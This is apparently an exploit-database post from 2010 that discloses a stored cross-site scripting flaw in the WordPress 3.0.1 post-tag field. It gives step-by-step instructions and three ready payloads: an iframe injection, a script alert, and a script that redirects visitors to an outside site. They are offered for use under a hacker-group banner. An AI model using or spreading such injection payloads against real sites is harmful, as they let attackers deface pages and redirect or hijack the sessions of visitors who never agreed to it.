Wordpress 3.0.1(Post Tag) XSS Vulnerability
Posted on 14 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Wordpress 3.0.1(Post Tag) XSS Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================== Wordpress 3.0.1(Post Tag) XSS Vulnerability =========================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################## 1 0 I'm Sid3^effects member from Inj3ct0r Team 1 1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Name : Wordpress 3.0.1(Post Tag) XSS Vulnerability Date : August, 14 2010 Vendor Url : http://wordpress.org/ Critical Level: Low Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com> Big hugs : Th3 RDX special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr greetz to :www.topsecure.net ,trent Dillman,All ICW members and my friends :) luv y0 guyz Happy Independence day to all Pakistani and Indians :D ####################################################################################################### Xploit: XSS Vulnerability Step 1 : Make a blog :) Step 2 : Now Goto http://urblog.wordpress.com/wp-admin/post-new.php Step 3 : Insert Xss scripts in the "POST TAG" option. Attack Patterns : * "><iframe src=http://www.inj3ct0r.com width="500%" height="500" > * "><script>alert("Inj3ct0r")</script> * <script>document.onload=location.href='http://www.inj3ct0r.com'</script> ############################################################################################################### NOTE : THIS ISSUE ISNT SO CRITICAL BUT YEA IT DOES EXECUTE XSS SCRIPTS SINCE IT IS NOT PROPERLY SANITISED.AND AT THE SAME TIME IF YOUR TRYIN TO INSERT SCRIPTS IN THE BELOW GIVEN URL : http://URBLOG.wordpress.com/wp-admin/edit-tags.php?taxonomy=post_tag,THE SCRIPTS DOES'NT GET EXECUTED SINCE THEY ARE PROPERLY SANITISED. ############################################################################################################### ScreenshotS : http://img401.imageshack.us/img401/225/14959664.png--->POPUP http://img832.imageshack.us/img832/2923/iframe.png --->IFRAME ############################################################################################################### # 0day no more # Sid3^effects # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-14]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
